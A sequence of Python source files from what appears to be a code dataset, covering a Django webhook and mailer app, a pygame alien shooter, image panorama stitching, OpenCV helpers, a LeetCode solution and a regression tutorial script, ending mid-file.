verticesLuminosity[:, None]\n\n def _render2D(self, ij, colors):\n self.depths = self.depths.detach()\n return TorchDifferentiableRender2D(ij, colors, self)\n","sub_path":"DEODR/pytorch/differentiable_renderer_pytorch.py","file_name":"differentiable_renderer_pytorch.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"93241924","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nimport json\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom webhook.base.forms import RelatorioForm\nfrom webhook.manager.models import Account\nfrom webhook.base.resources.tools import *\nfrom webhook.manager.scripts.update_data import DataManager\n\n\n@csrf_exempt\ndef playlogs(request):\n data = None\n if request.method == 'POST':\n content = bytes_to_dict(request.body)\n data_response = json.dumps(content, indent=2)\n print(content)\n file = download_gz(content['url'])\n data = process_file(file)\n if data:\n name_account = name_of_account(content['url'])\n try:\n conta = Account.objects.get(name__contains=name_account.split('-')[0].capitalize())\n records = insert_records(conta, data)\n except Exception as e:\n print('Error: ', e)\n return HttpResponse(f\"

{records} playlogs inseridos com sucesso!'

\")\n else:\n return render(request, 'base/playlogs.html', context={'contas': Account.objects.all(),\n 'no_info': {\n 'conta': name_of_account(\n content['url']).capitalize(),\n 'interval_date': f\"{content['filter']['startDate']} - {content['filter']['endDate']}\",\n 'interval_time': f\"{content['filter']['startTime']} - {content['filter']['endTime']}\",\n 'players': content['filter']['playerId'],\n 'medias': content['filter']['mediaId']\n }\n }\n )\n return render(request, 'base/playlogs.html', context={'contas': Account.objects.all(), })\n\n\n@login_required\n@csrf_exempt\ndef solicitar_relatorio(request):\n if request.method == 'POST':\n form = RelatorioForm(request.POST)\n if form.is_valid():\n slug_conta = (form.cleaned_data['conta'])\n startdate = str(form.cleaned_data['startdate'])\n enddate = str(form.cleaned_data['enddate'])\n conta = Account.objects.get(slug=slug_conta)\n account = DataManager(conta.token)\n params = dict(type='detailed', webhook=request.build_absolute_uri(reverse('base:playlogs')),\n filter={'startDate': startdate, 'endDate': enddate,\n 'startTime': '00:00:00', 'endTime': '23:59:59',\n 'mediaId': [], 'playerId': [], 'sort': -1})\n resp_post = account.post_report(params)\n if resp_post.status_code != 200:\n res = json.loads(resp_post.text)\n messages.error(request, res['details']['report'][0])\n return HttpResponseRedirect(reverse('base:solicitar_relatorio'))\n else:\n messages.success(request,\n f\"Relatório solicitado com sucesso.
Ver Playlogs\")\n return HttpResponseRedirect(reverse('base:solicitar_relatorio'))\n else:\n ctx = {'contas': Account.objects.all(), 'form': form}\n return render(request, 'base/solicitar_relatorio.html', ctx, status=400)\n\n\n else:\n form = RelatorioForm()\n ctx = {'contas': Account.objects.all(), 'form': form}\n return render(request, 'base/solicitar_relatorio.html', ctx)\n","sub_path":"webhook/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32520139","text":"import sys\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\n\ndef check_keydown_events(event,ai_settings,screen, ship,bullets):\n \"\"\"响应按键\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings,screen,ship,bullets)\n # elif event.key == pygame.k_w:\n # sys.exit()\n\ndef fire_bullet(ai_settings,screen,ship,bullets):\n \"\"\"如果还没达到限制,就发射一颗子弹\"\"\"\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings,screen,ship)\n bullets.add(new_bullet)\n\n # 创建一颗子弹,并将其加入到编组bullets中\n #if len(bullets) < ai_settings.bullets_allowed:\n #new_bullet = Bullet(ai_settings,screen,ship)\n #bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n \"\"\"响应松开\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\n\ndef check_events(ai_settings,screen,ship,bullets):\n # 监听键盘鼠标\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n\n check_keydown_events(event,ai_settings,screen,ship,bullets)\n\n elif event.type == pygame.KEYUP:\n check_keyup_events(event,ship)\n\n #向右移动飞船\n ship.rect.centerx += 1\n\ndef update_screen(ai_settings,screen,ship,aliens,bullets):\n \"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n # 每次循环时都重新绘制屏幕\n screen.fill(ai_settings.bg_color)\n #在飞船和外星人后面重新绘制子弹\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n # 让最近绘制的屏幕可见\n pygame.display.flip()\n\ndef update_bullets(aliens,bullets):\n \"\"\"更新子弹位置,并删除已消失的子弹\"\"\"\n #更新子弹位置\n bullets.update()\n # 删除已消失的子弹\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n #检查是否有子弹击中外星人\n #如果是这样,就删除响应的子弹和外星人\n collisions = pygame.sprite.groupcollide(bullets,aliens,True,True)\n\ndef get_number_aliens_x(ai_settings,alien_width):\n \"\"\"计算每行可容纳多少个外星人\"\"\"\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n\ndef get_number_rows(ai_settings,ship_height,alien_height):\n \"\"\"计算屏幕可容纳多少行外星人\"\"\"\n available_apace_y = (ai_settings.screen_height - (3 * alien_height) - ship_height)\n number_rows = int(available_apace_y / (2 * alien_height))\n return number_rows\n\ndef create_alien(ai_settings,screen,aliens,alien_number,row_number):\n \"\"\"创建一个外星人并将其放在当前行\"\"\"\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.y = alien.rect.height + 2 * alien.rect.height * row_number\n alien.rect.x = alien.x\n aliens.add(alien)\n\n\ndef create_fleet(ai_settings,screen,ship,aliens):\n \"\"\"创建外星人群\"\"\"\n #创建一个外星人,并计算一行可容纳多少个外星人\n #外星人间距为外星人宽度\n alien = Alien(ai_settings,screen)\n number_aliens_x = get_number_aliens_x(ai_settings,alien.rect.width)\n number_rows = get_number_rows(ai_settings,ship.rect.height,alien.rect.height)\n #创建外星人群\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n #创建一个外星人并将其加入前行\n create_alien(ai_settings,screen,aliens,alien_number,row_number)\n\ndef check_fleet_edges(ai_settings,aliens):\n \"\"\"有外星人到达边缘时才去对应措施\"\"\"\n for alien in aliens.sprites():\n if alien.check_edges():\n change_fleet_direction(ai_settings,aliens)\n break\n\ndef change_fleet_direction(ai_settings,aliens):\n \"\"\"将整群外星人下移,并改变他们的方向\"\"\"\n for alien in aliens.sprites():\n alien.rect.y += ai_settings.fleet_drop_speed\n ai_settings.fleet_direction *= -1\n\ndef update_aliens(ai_settings,aliens):\n \"\"\"检查是否有外星人位于屏幕边缘,并更新外星人群众所有外星人的位置\"\"\"\n check_fleet_edges(ai_settings,aliens)\n aliens.update()\n\n","sub_path":"alien_invasion/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462081014","text":"'''\nHuajie Shao@2016/9/01\nFunction: check the opinion reported by sources\nand If they are in the follower-followees trees\nInput: tweets ids---->to--->social trees\n'''\n\n# -*- coding:utf-8 -*-\nimport ast\nimport operator\n\n\n###--Fun:get the timestamp tweet_ids and sourc_ids from the tweets\nfw_time = open('Tids_Sid_time.txt','w') # record the Tw_ids and src_ids\ntweet_time = dict()\nwith open(\"input2.txt\") as tweets:\n\tfor str_texts in tweets:\n\t\tdict_tweet = ast.literal_eval(str_texts)\n\t\ttime = dict_tweet['created_at'].replace('+0000 ','')\n\t\tusers= dict_tweet['user']\t\t#get the information of users\n\t\tsrc_ids = users['id_str']\n\t\ttw_id = dict_tweet['id']\n\t\ttweet_time[str(tw_id)] = [src_ids,time] #tweet, sourc and time\n\t\tfw_time.write(str(tw_id)+'\\t'+str(src_ids)+'\\t'+str(time)+'\\n')\n\nfw_time.close()\n\n\n# #----Fun: get tweets_id and source_id_time_asstion ids\nfw_all_info = open('Tids_Sids_Aid_Tm.txt','w')\nfw_fst = open('First_sources.txt','w')\nfw_src_claim = open('Source_claims.txt','w')\nFirst_user = dict()\nfirst_src_list=[]\nFollow_count =dict()\nf_tweet_ids = open(\"cluster_desc.txt\",'r') #tweets ids and sources ids\nfor tweet_id in f_tweet_ids.readlines()[0:150]:\t# readline():[0:2]\n\tids = tweet_id.split()\n\tfor i in range(1,len(ids)):\n\t\tsrc_time = tweet_time[ids[i]]\n\t\tS_ids = src_time[0]\n\t\ttimestamp = src_time[1]\n\t\tfor j in range(i+1,len(ids)):\n\t\t\tsource_next = tweet_time[ids[j]]\n\t\t\tnext_sids = source_next[0]\n\t\t\tif S_ids != next_sids:\n\t\t\t\tsrc_pair = (S_ids,next_sids)\n\t\t\t\tif src_pair in Follow_count:\n\t\t\t\t\tFollow_count[src_pair] += 1\n\t\t\t\telse:\n\t\t\t\t\tFollow_count[src_pair] = 1\n\t\t\n\t\tif i == 1:\n\t\t\tFirst_user[ids[0]] = S_ids\n\t\t\tfw_fst.write(S_ids+'\\n')\n\t\t\tfirst_src_list.append(S_ids) #get the first sources\n\n\t\tfw_all_info.write(ids[i]+'\\t'+S_ids+'\\t'+ids[0]+'\\t'+timestamp+'\\n')\n\t\tfw_src_claim.write(S_ids+'\\t'+ids[0]+'\\n')\n\t\t\n\nfw_all_info.close()\nfw_fst.close()\n\n# print(Follow_count[('1','1')])\nfw_graph = open('Ancestor-children.txt','w')\nRank_graph = sorted(Follow_count.items(), key=operator.itemgetter(1), reverse=True)\nfor elments in Rank_graph:\n\tif elments[1] >1:\n\t\tancestor = elments[0][0]\n\t\tchild = elments[0][1]\n\t\tfw_graph.write(ancestor+'\\t'+child+'\\n')\n\t\t# print(elments[0])\n\nfw_graph.close()\nprint(\"good work, well done\")\n","sub_path":"EM-opinion/Check_opinion_follower_tree.py","file_name":"Check_opinion_follower_tree.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616881514","text":"import numpy as np\nimport cv2\nimport sys\nfrom matchers import matchers\nimport time\nfrom panorama import Sticher\nclass Stitch:\n\tdef __init__(self, args):\n\t\tself.path = args\n\t\tfp = open(self.path, 'r')\n\t\tfilenames = [each.rstrip('\\r\\n') for each in fp.readlines()]\n\t\tprint( filenames)\n\t\tself.images = [cv2.resize(cv2.imread(each),(960, 720)) for each in filenames]\n\t\t#self.images = [cv2.imread(each) for each in filenames]\n\t\tself.count = len(self.images)\n\t\tself.left_list, self.right_list, self.center_im = [], [],None\n\t\tself.matcher_obj = matchers()\n\t\tself.prepare_lists()\n\n\tdef warpTwoImages(self, img2, img1, H):\n\t\t'''warp img2 to img1 with homograph H'''\n\t\th1,w1 = img1.shape[:2]\n\t\th2,w2 = img2.shape[:2]\n\t\tpts1 = np.array([[0,0],[0,h1],[w1,h1],[w1,0]], dtype= 'f').reshape(-1,1,2)\n\t\tpts2 = np.array([[0,0],[0,h2],[w2,h2],[w2,0]], dtype= 'f').reshape(-1,1,2)\n\t\tpts2_ = cv2.perspectiveTransform(pts2, H)\n\t\tpts = np.concatenate((pts1, pts2_), axis=0)\n\t\t[xmin, ymin] = np.array(pts.min(axis=0).ravel() - 0.5,dtype='int')\n\t\t[xmax, ymax] = np.array(pts.max(axis=0).ravel() + 0.5,dtype='int')\n\t\tprint(\"mins are\")\n\t\tprint(xmin,ymin)\n\t\tt = [-xmin,-ymin]\n\t\tHt = np.array([[1,0,t[0]],[0,1,t[1]],[0,0,1]]) # translate\n\t\t\n\t\ta = xmax-xmin\n\t\tb = (ymax-ymin)\n\t\tprint(a,b)\n\t\t# paddy = np.zeros([b,a,3])\n\t\t# print('paddy= ',paddy.shape)\n\t\t# print('img2= ',img2.shape)\n\t\t# paddy[0:img2.shape[0],0:img2.shape[1]] = img2\n\n\t\t#np.pad(img2, ((0,2), (0,2)),'constant',constant_values=0)\n\n\n\t\t# warped img2\n\t\tresult = cv2.warpPerspective(img2, Ht.dot(H), dsize=(a,b))\t\t# do blending here somewhere! ! ! ! !\n\n\t\tprint('result= ',result.shape)\n\t\t# src_mask = np.zeros(img1.shape, img1.dtype) \n\n\t\t# adding base image to the warped image (overlapping it if required)\t\t# this part merges old image ( abhi tak ka panorama) on top of newly warped\n\t\tfor i in range(h1):\n\t\t\tfor j in range(w1):\n\t\t\t\tif(img1[i,j].all()!=0): # all 3 coordinates are non-0\n\t\t\t\t\t# src_mask[i,j]=1\n\t\t\t\t\t# #alpha = 0.75\n\t\t\t\t\t# #beta=1-alpha\n\t\t\t\t\tresult[t[1]+i,t[0]+j]=img1[i,j]\n\t\t\t\t\t#cv2.addWeighted( img1[i,j], alpha, result[i,j], beta, 0.0, result[t[1]+i,t[0]+j]);\n\n\n\t\t\n\t\t# poly = np.array([ [4,80], [30,54], [151,63], [254,37], [298,90], [272,134], [43,122] ], np.int32)\n\t\t# cv2.fillPoly(src_mask, [poly], (255, 255, 255))\n\t\t \n\t\t# # This is where the CENTER of the airplane will be placed\n\t\t# center = (t[1]+h1//2,t[0]+w1//2)\n\t\t# # Clone seamlessly.\n\t\t# a = xmax-xmin-img1.shape[0]\n\t\t# b = (ymax-ymin-img1.shape[1])\n\n\t\t# print(xmax-xmin-img1.shape[0])\n\n\t\t# np.pad(img1, ((0,a), (0,b)),'constant',constant_values=0)\n\t\t# output = cv2.seamlessClone(img1, result, src_mask, center, cv2.NORMAL_CLONE)\n\t\t# cv2.imwrite(\"hey.jpg\", output);\n\t\treturn result\n\n\tdef prepare_lists(self):\n\t\tprint( \"Number of images : %d\"%self.count)\n\t\tself.centerIdx =self.count/2 \n\t\tprint( \"Center index image : %d\"%self.centerIdx)\n\t\tself.center_im = self.images[int(self.centerIdx)]\n\t\tfor i in range(self.count):\n\t\t\tif(i<=self.centerIdx):\n\t\t\t\tself.left_list.append(self.images[i])\n\t\t\telse:\n\t\t\t\tself.right_list.append(self.images[i])\n\t\tprint( \"Image lists prepared\")\n\n\tdef leftshift(self):\n\t\t# self.left_list = reversed(self.left_list)\n\t\tb = self.left_list[-1]\n\t\tfor a in reversed(self.left_list[0:-1]):\n\t\t\tH = self.matcher_obj.match(a,b,'left','homography')\n\t\t\t# print( \"Homography is : \", H)\n\t\t\txh = np.linalg.inv(H)\n\t\t\t# print( \"Inverse Homography :\", xh)\n\t\t\tds = np.dot(xh, np.array([a.shape[1], a.shape[0], 1]));\n\t\t\tds = ds/ds[-1]\n\t\t\t# print( \"final ds=>\", ds)\n\t\t\tf1 = np.dot(xh, np.array([0,0,1]))\n\t\t\tf1 = f1/f1[-1]\n\t\t\txh[0][-1] += abs(f1[0])\n\t\t\txh[1][-1] += abs(f1[1])\n\t\t\tds = np.dot(xh, np.array([a.shape[1], a.shape[0], 1]))\n\t\t\toffsety = abs(int(f1[1]))\n\t\t\toffsetx = abs(int(f1[0]))\n\t\t\tdsize = (int(ds[0])+offsetx, int(ds[1]) + offsety)\n\t\t\tprint( \"image dsize =>\", dsize)\n\t\t\t#tmp = cv2.warpPerspective(a, xh, dsize)\n\t\t\t# cv2.imshow(\"warped\", tmp)\n\t\t\t# cv2.waitKey()\n\t\t\tprint((b.shape))\n\t\t\t#tmp[offsety:b.shape[0]+offsety, offsetx:b.shape[1]+offsetx] = b\n\t\t\t#tmp[0:b.shape[0], 0:b.shape[1]] = b\n\n\t\t\t(tmp) = stitcher.stitch([a, b])\n\t\t\t# tmp = self.warpTwoImages(a,b,H)\n\t\t\t# tmp = self.mix_and_match(a, tmp)\n\t\t\tb = tmp\n\n\t\tself.leftImage = b\n\n\t\t\n\tdef rightshift(self):\n\t\ta = self.leftImage\n\t\tfor b in self.right_list:\n\t\t\tH = self.matcher_obj.match(b, a, 'right', 'homography')\n\t\t\tprint( \"Homography :\", H)\n\t\t\t# txyz = np.dot(H, np.array([b.shape[1], b.shape[0], 1]))\n\t\t\t# txyz = txyz/txyz[-1]\n\t\t\t# dsize = (int(txyz[0])+a.shape[1], int(txyz[1])+a.shape[0])\n\t\t\t#tmp = cv2.warpPerspective(b, H, dsize)\n\t\t\t# cv2.imshow(\"tp\", tmp)\n\t\t\t# cv2.waitKey()\n\t\t\t# tmp[:a.shape[0], :a.shape[1]]=a\n\t\t\t\n\t\t\t# print( \"tmp shape\",tmp.shape)\n\t\t\t# print( \"a shape=\", a.shape)\n\n\t\t\t(tmp) = stitcher.stitch([a, b])\n\t\t\t# tmp = self.warpTwoImages(b,a,H)\n\t\t\t#tmp = self.mix_and_match(a, tmp)\n\t\t\ta = tmp\n\n\t\tself.leftImage = a\n\t\t# self.showImage('left')\n\n\n\tdef Laplacian_blending(self, A,B,mask,levels=4):\n\n\t\n# generate Gaussian pyramid for A\n\t\tG = A.copy()\n\t\tgpA = [G]\n\t\tfor i in xrange(6):\n\t\t\tG = cv2.pyrDown(G)\n\t\t\tgpA.append(G)\n\n\t\t# generate Gaussian pyramid for B\n\t\tG = B.copy()\n\t\tgpB = [G]\n\t\tfor i in xrange(6):\n\t\t\tG = cv2.pyrDown(G)\n\t\t\tgpB.append(G)\n\n\t\t# generate Laplacian Pyramid for A\n\t\tlpA = [gpA[5]]\n\t\tfor i in xrange(5,0,-1):\n\t\t\tGE = cv2.pyrUp(gpA[i])\n\t\t\tL = cv2.subtract(gpA[i-1],GE)\n\t\t\tlpA.append(L)\n\n\t\t# generate Laplacian Pyramid for B\n\t\tlpB = [gpB[5]]\n\t\tfor i in xrange(5,0,-1):\n\t\t\tGE = cv2.pyrUp(gpB[i])\n\t\t\tL = cv2.subtract(gpB[i-1],GE)\n\t\t\tlpB.append(L)\n\n\t\t# Now add left and right halves of images in each level\n\t\tLS = []\n\t\tfor la,lb in zip(lpA,lpB):\n\t\t\trows,cols,dpt = la.shape\n\t\t\tls = np.hstack((la[:,0:cols/2], lb[:,cols/2:]))\n\t\t\tLS.append(ls)\n\n\t\t# now reconstruct\n\t\tls_ = LS[0]\n\t\tfor i in xrange(1,6):\n\t\t\tls_ = cv2.pyrUp(ls_)\n\t\t\tls_ = cv2.add(ls_, LS[i])\n\n\n\t\treturn ls_\n\n\n\n\n\tdef mix_and_match(self, leftImage, warpedImage):\n\t\ti1y, i1x = leftImage.shape[:2]\n\t\ti2y, i2x = warpedImage.shape[:2]\n\t\tprint( leftImage[-1,-1])\n\n\t\tt = time.time()\n\t\tblack_l = np.where(leftImage == np.array([0,0,0]))\n\t\tblack_wi = np.where(warpedImage == np.array([0,0,0]))\n\t\tprint( time.time() - t)\n\t\t# print( black_l[-1])\n\n\t\tfor i in range(0, i1x):\n\t\t\tfor j in range(0, i1y):\n\t\t\t\ttry:\n\t\t\t\t\tif(np.array_equal(leftImage[j,i],np.array([0,0,0])) and np.array_equal(warpedImage[j,i],np.array([0,0,0]))):\n\t\t\t\t\t\t# print( \"BLACK\")\n\t\t\t\t\t\t# instead of just putting it with black, \n\t\t\t\t\t\t# take average of all nearby values and avg it.\n\t\t\t\t\t\twarpedImage[j,i] = [0, 0, 0]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(np.array_equal(warpedImage[j,i],[0,0,0])):\n\t\t\t\t\t\t\t# print( \"PIXEL\")\n\t\t\t\t\t\t\twarpedImage[j,i] = leftImage[j,i]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif not np.array_equal(leftImage[j,i], [0,0,0]):\n\t\t\t\t\t\t\t\tbw, gw, rw = warpedImage[j,i]\n\t\t\t\t\t\t\t\tbl,gl,rl = leftImage[j,i]\n\t\t\t\t\t\t\t\t# b = (bl+bw)/2\n\t\t\t\t\t\t\t\t# g = (gl+gw)/2\n\t\t\t\t\t\t\t\t# r = (rl+rw)/2\n\t\t\t\t\t\t\t\twarpedImage[j, i] = [bl,gl,rl]\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t# cv2.imshow(\"waRPED mix\", warpedImage)\n\t\t# cv2.waitKey()\n\t\treturn warpedImage\n\n\n\n\tdef trim_left(self):\n\t\tpass\n\n\tdef showImage(self, string=None):\n\t\tif string == 'left':\n\t\t\tcv2.imwrite(\"./hey/leftImage.jpg\", self.leftImage)\n\t\t\t# cv2.imshow(\"left image\", cv2.resize(self.leftImage, (400,400)))\n\t\telif string == \"right\":\n\t\t\tcv2.imwrite(\"./hey/rightImage.jpg\", self.rightImage)\n\n\nif __name__ == '__main__':\n\ttry:\n\t\targs = sys.argv[1]\n\texcept:\n\t\targs = \"./txtlists/files3.txt\"\n\tfinally:\n\t\tprint( \"Parameters : \", args)\n\ts = Stitch(args)\n\ts.leftshift()\n\t# s.showImage('left')\n\ts.rightshift()\n\n\tprint((\"done\"))\n\tcv2.imwrite(\"./Outputs/answer.jpg\", s.leftImage)\n\tprint( \"image written\")\n\tcv2.destroyAllWindows()\n\t\n","sub_path":"pano_less_error.py","file_name":"pano_less_error.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414231964","text":"# title: find-the-town-judge\n# detail: https://leetcode.com/submissions/detail/401423407/\n# datetime: Sun Sep 27 23:42:16 2020\n# runtime: 764 ms\n# memory: 18.6 MB\n\nclass Solution:\n def findJudge(self, N: int, trust: List[List[int]]) -> int:\n cnt = collections.Counter()\n s = set()\n for a, b in trust:\n cnt[b] += 1\n s.add(a)\n m = cnt.most_common(2)\n if not m :\n if N == 1:\n return 1\n return -1\n if m[0][1] == N - 1 and (len(m) == 1 or m[1][1] < N - 1) and m[0][0] not in s:\n return m[0][0]\n return -1 ","sub_path":"leetcode/find-the-town-judge/401423407.py","file_name":"401423407.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"507478528","text":"import numpy as np, cv2, time\n\ndef print_matInfo(name, image): # 행렬 정보 출력 함수\n if image.dtype == 'uint8': mat_type = \"CV_8U\"\n elif image.dtype == 'int8': mat_type = \"CV_8S\"\n elif image.dtype == 'uint16': mat_type = \"CV_16U\"\n elif image.dtype == 'int16': mat_type = \"CV_16S\"\n elif image.dtype == 'float32': mat_type = \"CV_32F\"\n elif image.dtype == 'float64': mat_type = \"CV_64F\"\n nchannel = 3 if image.ndim == 3 else 1\n\n # depth, channel 출력\n print(\"%12s: depth(%s), channels(%s) -> mat_type(%sC%d)\"\n % (name, image.dtype, nchannel, mat_type, nchannel))\n\n# 수행시간 체크 함수\nstime = 0\ndef ck_time(mode = 0 , msg = \"\"):\n global stime\n\n if (mode ==0 ):\n stime = time.perf_counter()\n\n elif (mode==1):\n etime = time.perf_counter()\n elapsed = (etime - stime)\n print(\"수행시간 = %.5f sec\" % elapsed) # 초 단위 경과 시간\n\n elif (mode == 2):\n etime = time.perf_counter()\n return (etime - stime)\n\n elif (mode== 3 ):\n etime = time.perf_counter()\n elapsed = (etime - stime)\n print(\"%s = %.5f sec\" %(msg, elapsed)) # 초 단위 경과 시간\n\ndef time_check(func, image, size, title): ## 수행시간 체크 함수\n\tstart_time = time.perf_counter()\n\tret_img = func(image, size)\n\telapsed = (time.perf_counter() - start_time) * 1000\n\tprint(\"%s elapsed time = %0.2f ms\" % (title, elapsed))\n\treturn ret_img\n\n\n# 문자열 출력 함수 - 그림자 효과\ndef put_string(frame, text, pt, value=None, color=(120, 200, 90)) :\n text = str(text) + str(value)\n shade = (pt[0] + 2, pt[1] + 2)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(frame, text, shade, font, 0.7, (0, 0, 0), 2) # 그림자 효과\n cv2.putText(frame, text, pt , font, 0.7, color, 2) # 작성 문자\n\ndef print_mat(image , name = \"mat\"):\n print(name)\n if len(image.shape) == 1 :\n for i in range(image.shape[0]):\n print(\"%2.2f \" %image[i] , end='')\n\n elif len(image.shape) == 2 :\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n print(\"%s \" %image[i,j], end='')\n print()\n\n print()\n\ndef contain(p, shape): # 좌표(y,x)가 범위내 인지 검사\n return 0<= p[0] < shape[0] and 0<= p[1] < shape[1]\n\ndef contain_pts(p, p1, p2):\n return p1[0] <= p[0] < p2[0] and p1[1] <= p[1] < p2[1]\n\n# 시작점 종료점 사각형을 시작점, 크기 형식으로 변환\ndef rect_convert(rect):\n x0, y0, x1, y1 = rect\n pt1, pt2 = (x0, y0), (x1, y1)\n size = np.subtract(pt2, pt1) # 두좌표 차분 - 너비 높이 계산\n\n return (pt1[0], pt1[1], size[0], size[1])\n\n# 시작점과 크기로 사각형 정의\ndef define_rect(pt, size):\n return (pt[0], pt[1], size[0], size[1])\n\n# 시작점 종료점으로 사각형 정의\ndef define_rect_pt(pt1, pt2):\n size = np.subtract(pt2, pt1) # 두좌표 차분 - 너비 높이 계산\n return (pt1[0], pt1[1], size[0], size[1])","sub_path":"Common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461385543","text":"#Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\nY = dataset.iloc[:, 4].values\n\n# Encoding Categorical Data\n# Encoding the Independent Variable\n# 1st Column: Cali, 2nd Column: Florida, 3rd Column: New York\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:,3] = labelencoder_X.fit_transform(X[:,3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n#Avoiding the Dummy Variable Trap [Remove Cali from the Dataset]\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\n\"\"\"from sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\nsc_y = StandardScaler()\ny_train = sc_y.fit_transform(y_train)\"\"\"\n\n\n\n# Fitting Multiple Linear \nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression() #Create regressor object\nregressor.fit(X_train, Y_train) #Fit our regressor to our regressor\n\n# Predicting the Test set results\nY_pred = regressor.predict(X_test)\n\n\n# Curently we have created the 'All-in' Model\n# ---- Building the optimal model using Backward Elimination ------\n\n\nimport statsmodels.formula.api as sm\n#Create column of 1s that represent the b0 constant of the equation\nX = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1) \nX_opt = X[:,[0,1,2,3,4,5]]\n\n# Step 2 of Backward Elimination\nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() # Create Ordinary Least Squares Regressor\nregressor_OLS.summary() # <---- From the summary we notice that x2 has the highest P value > SL\n\nX_opt = X[:,[0,1,3,4,5]] # Therefore we remove x2 from the equation, refit our regressor and see the new summary\nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3,4,5]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3,5]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n\nX_opt = X[:,[0,3]] \nregressor_OLS = sm.OLS(endog = Y, exog = X_opt).fit() \nregressor_OLS.summary() \n","sub_path":"UdemyMachineLearning/Multiple_Linear_Regression/multiple_linear_regression(Jordan).py","file_name":"multiple_linear_regression(Jordan).py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64739066","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom django.http import Http404, BadHeaderError, HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.template import Template\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom mailer.forms import UserForm, GroupForm, ContactForm, LetterForm, CampaignForm\nfrom mailer.models import Group, Contact, Letter, Campaign\n\n\ndef sing_up(request):\n user_form = UserForm()\n\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n\n if user_form.is_valid():\n User.objects.create_user(**user_form.cleaned_data)\n\n login(request, authenticate(\n username=user_form.cleaned_data['username'],\n password=user_form.cleaned_data['password']\n ))\n\n return redirect('/')\n\n return render(request, 'auth/sing_up.html', {\n 'user_form': user_form\n })\n\n\n@login_required(login_url='sing-in')\ndef home(request):\n return render(request, template_name='mailer/home.html') \\\n \\\n \\\n@login_required(login_url='sing-in')\ndef groups(request):\n user = request.user\n group_list = user.group_set.all()\n return render(request, 'mailer/groups.html',\n {'group_list': group_list})\n\n\n@login_required(login_url='sing-in')\ndef create_group(request):\n group_form = GroupForm\n\n if request.method == 'POST':\n group_form = GroupForm(request.POST)\n if group_form.is_valid():\n new_group = 